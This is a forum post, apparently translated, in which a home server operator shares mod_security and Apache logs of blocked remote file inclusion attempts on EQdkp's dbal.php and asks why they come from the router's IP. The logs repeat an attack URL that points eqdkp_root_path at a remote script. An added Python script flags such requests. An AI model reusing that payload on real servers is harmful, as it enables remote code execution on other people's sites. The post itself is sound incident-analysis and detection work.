The IP that attempted the intrusion is my router???
Author: 문경윤
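I am running the mod_security web application firewall.
I run the server at home and offer free hosting on it.
The server sits behind a router. The router's address is 192.168.0.254.
The router suddenly started lagging badly, and Internet access stopped working properly not only on the server but on my desktop as well, so I analyzed the server logs.
I have been cracked before. Intrusion attempts keep coming in through the same account.
First, here are the log entries for the intrusion attempts that were caught by mod_security's filtering policy.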
[05/Feb/2008:11:31:58 +0900] [www.ktguild.net/sid#9874ab8][rid#997d368]
[/home/newdkp/eqdkp//includes/dbal.php][1] Access denied with code 403. Pattern
match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:31:59 +0900] [www.ktguild.net/sid#9874ab8][rid#9966310]
[//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:31:59 +0900] [www.ktguild.net/sid#9874ab8][rid#9966310]
[/home/newdkp//includes/dbal.php][1] Access denied with code 403. Pattern
match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:32:53 +0900] [www.wowvindicators.com/sid#9874ab8][rid#9966310]
[/eqdkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include"
at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:32:55 +0900] [www.wowvindicators.com/sid#9874ab8][rid#9966310]
[//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:36:48 +0900] [www.wowhost.dk/sid#9874ab8][rid#997f370]
[/oldtimers/dkp/plugins/raidplan//includes/dbal.php][1] Access denied with code 403.
Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:43:45 +0900] [www.projmayhem.com/sid#9874ab8][rid#9971338]
[/dkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
Next is the content of /usr/local/apache/logs/error_log.
[Tue Feb 05 11:22:41 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.seraphinguild.net"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:18 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.hgfollowers.com"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:28 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.hgfollowers.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:38 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.hgfollowers.com"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:06 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.fragfrogs.ca"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.fragfrogs.ca"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:27 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.fragfrogs.ca"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:38 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.destinyknights.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:22 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "destinyknights.com"] [uri "/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:32 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "destinyknights.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:33 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.seraphinguild.net"]
[uri "/core//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:28:20 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.hgfollowers.com"] [uri "/dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:58 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ktguild.net"]
[uri "/home/newdkp/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:59 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ktguild.net"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:59 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ktguild.net"]
[uri "/home/newdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:32:53 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.wowvindicators.com"]
[uri "/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:32:55 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.wowvindicators.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:36:48 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.wowhost.dk"]
[uri "/oldtimers/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:43:45 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.projmayhem.com"] [uri "/dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:46:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "equitas-guild.info"] [uri "/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:46:23 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "equitas-guild.info"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:47:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.fragfrogs.ca"] [uri "/dkp2//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:12 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ohayojapan.com"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:13 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ohayojapan.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ohayojapan.com"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
Finally, here is the content of /usr/local/apache/logs/access_log. I gathered only the entries recorded in the same time window as the intrusion attempts logged by the web firewall and the Apache error log.
192.168.0.254 - - [05/Feb/2008:11:31:58
+0900] "GET /home/newdkp/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 305 "-" "libwww-
perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET //includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 287 "-" "libwww-
perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET /home/newdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 299 "-" "libwww-
perl/5.79"
121.136.176.72 - - [05/Feb/2008:11:31:59
+0900] "GET /8th/images/98img/analysis_terry.gif HTTP/1.1" 200
5441 "http://blog.naver.com/PostList.nhn?
blogId=fkdiidkrk&currentPage=103&categoryNo=30&viewdate=" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1)"
192.168.0.254 - - [05/Feb/2008:11:32:53 +0900] "GET /eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 300 "-" "libwww-
perl/5.79"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /frb.JPG HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_num.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/title_breaker.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_date.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_subject.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
192.168.0.254 - - [05/Feb/2008:11:32:55 +0900] "GET //includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 294 "-" "libwww-
perl/5.79"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/btn_list.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_vote.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_register.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/blank.gif%20width= HTTP/1.1" 404
325 "http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_view.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/t.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/search.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/cancle.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
192.168.0.254 - - [05/Feb/2008:11:36:48
+0900] "GET /oldtimers/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 317 "-" "libwww-
perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:43:45 +0900] "GET /dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 294 "-" "libwww-
perl/5.79"
When I check the processes with the ps -ef command, odd entries like the ones below still show up even now.
nobody 4914 1 0 10:39 ? 00:00:00 /^^/
nobody 5112 1 0 10:41 ? 00:00:01 /^^/
nobody 5114 1 0 10:41 ? 00:00:01 /^^/
nobody 5118 1 0 10:42 ? 00:00:01 /^^/
nobody 5120 1 0 10:42 ? 00:00:10 /^^/
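Checking the server load with the top command does not show anything unusual either. The only thing is that the number of zombie processes goes back and forth between 3 and 4.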
14:18, 2 users, load average: 0.07, 0.11, 0.13
Tasks: 117 total, 1 running, 112 sleeping, 1 stopped, 3 zombie
Cpu(s): 0.0% us, 0.3% sy, 0.0% ni, 99.0% id, 0.7% wa, 0.0% hi, 0.0% si
Mem: 514736k total, 438260k used, 76476k free, 21104k buffers
Swap: 1052248k total, 3692k used, 1048556k free, 247484k cached
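As you can see from the access_log file, the intrusion attempts are recorded as coming from the router's address.
Whenever I was cracked before, only external IPs showed up, but this is the first time I have seen a record like this. It shows up as the router's internal address.
What kind of intrusion should this be considered?
I need to block the IP or something, but since it shows up as the router, I'm at a loss.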
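Added example (not part of the original post): a Python triage script that scans Apache combined-format access_log lines for requests like the ones above, where a query parameter's value is itself a URL, and marks whether the logged client is an internal address such as the router's 192.168.0.254, in which case the log does not identify an external origin. The function names are hypothetical, and the sample lines are modelled on the post plus one constructed entry.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Sample lines modelled on the post's access_log (wrapped entries rejoined,
# one shortened) plus one constructed entry from 203.0.113.7.
SAMPLE_LOG = """\
192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET //includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 287 "-" "libwww-perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:32:53 +0900] "GET /eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 300 "-" "libwww-perl/5.79"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /frb.JPG HTTP/1.1" 304 - "http://mse9000.digimoon.net/CGI/zb41/zboard.php?id=Kommunity_Freeboard" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.0.113.7 - - [05/Feb/2008:11:40:00 +0900] "GET /index.php?page=ftp://example.invalid/x.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.79"
"""
# RFC 1918 and loopback ranges, listed explicitly.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)'
    r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
REMOTE_URL = re.compile(r"(?i)^(?:https?|ftp)://")

def is_internal(addr):
    """True if the logged client is an RFC 1918 or loopback address."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:  # the log holds a hostname instead of an address
        return False
    return any(ip in net for net in INTERNAL_NETS)

def find_remote_include_attempts(log_text):
    """Return one record per request whose query string carries a URL as a value."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read "//includes" as a network location.
        _path, _, query = m["target"].partition("?")
        params = [k for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE_URL.match(v)]
        if params:
            hits.append({"client": m["client"], "time": m["ts"], "ua": m["ua"],
                         "status": int(m["status"]), "params": params,
                         "internal": is_internal(m["client"])})
    return hits

def summarize(hits):
    """Count hits per (client, user agent) and how many were not answered with 403."""
    groups = defaultdict(lambda: {"count": 0, "not_blocked": 0, "internal": False})
    for h in hits:
        g = groups[(h["client"], h["ua"])]
        g["count"] += 1
        g["not_blocked"] += h["status"] != 403
        g["internal"] = h["internal"]
    return dict(groups)
```

Calling `summarize(find_remote_include_attempts(SAMPLE_LOG))` groups the flagged requests by client and user agent; any group with a non-zero `not_blocked` count is a request the filter did not answer with 403 and is the first thing to review.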